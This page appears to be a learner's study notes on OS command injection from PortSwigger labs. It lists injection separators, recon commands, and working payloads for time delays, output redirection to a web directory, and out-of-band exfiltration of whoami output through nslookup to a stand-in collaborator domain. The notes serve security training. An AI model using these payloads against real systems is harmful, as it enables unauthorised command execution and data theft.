🕸️
Web Security Notes
  • README
  • Portswigger
    • Access Control
      • notes
      • labs
    • Authentication
      • notes
      • labs
    • Business Logic Vulnerabilities
      • notes
      • labs
    • Clickjacking
      • notes
      • labs
    • Command Injection
      • notes
      • labs
    • CORS
      • notes
      • labs
    • CSRF
      • notes
      • labs
    • Directory Traversal
      • notes
      • labs
    • DOM-based Vulnerabilities
      • notes
      • labs
    • File upload Vulnerabilities
      • notes
      • labs
    • HTTP Host Header Attacks
      • notes
      • labs
    • HTTP Request Smuggling
      • notes
      • labs
    • Information Disclosure
      • notes
      • labs
    • Insecure Deserialization
      • notes
      • labs
    • JWT Attacks
      • notes
      • labs
    • OAuth Authentication
      • notes
      • labs
    • Server Side Template Injection
      • notes
      • labs
    • SQL injection
      • notes
      • labs
      • cheat sheet
    • SSRF
      • notes
      • labs
    • Web Cache Poisoning
      • notes
      • labs
    • WebSockets
      • notes
      • labs
    • XSS
      • notes
      • labs
    • XXE Injection
      • notes
      • labs
Powered by GitBook
On this page
  • Useful Commands
  • Ways of injecting OS commands
  • using time delays
  • redirecting output
  • with out-of-band interaction
  1. Portswigger
  2. Command Injection

notes

The information is accessed via a URL like https://insecure-website.com/stockStatus?productID=432&storeID=32

  • this will execute the shell command with the product and store IDs as arguments such as stockreport.pl 432 32

  • For command injection, attacker can submit the following input to execute an arbitary command; & echo asdfsdf & and the backend will call the command as follow; stockreport.pl 432 & echo sdfsdfsdf & 32 and will get an error.

eg - productId=2&storeId=2|whoami in POST request header

Useful Commands

Purpose
Linux
Window

Name of user

whoami

whoami

OS

uname -a

ver

network conf

ifconfig

ipconfig /all

network connection

netstat -an

netstat -an

running processes

ps -ef

tasklist

Ways of injecting OS commands

  • & , && , | , || (both unix and windows)

  • ; , 0x0a or \n (for unix)

using time delays

eg - POST request for form submit => csrf=g12AXHTk57AsU2J2ID68mqsxwVByepIg&name=test&email=test%40gmail.com&subject=Testing&message=Testing+the+OS+command+injection

  • command to inject & sleep 10s # (# for comment out the following commands) and change it to url encode.

  • then try to inject at the end of each parameters (name, email, subject, message)

csrf=g12AXHTk57AsU2J2ID68mqsxwVByepIg&name=test&email=test%40gmail.com+%26+sleep+10s+%23&subject=Testing&message=Testing+the+OS+command+injection

redirecting output

& whoami > /var/www/static/whoami.txt &

%26+whoami+>+/var/www/images/whoami.txt+%23

with out-of-band interaction

& nslookup whoami.BURP-COLLABORATOR-DOMAIN &

PreviousCommand InjectionNextlabs

Last updated 2 years ago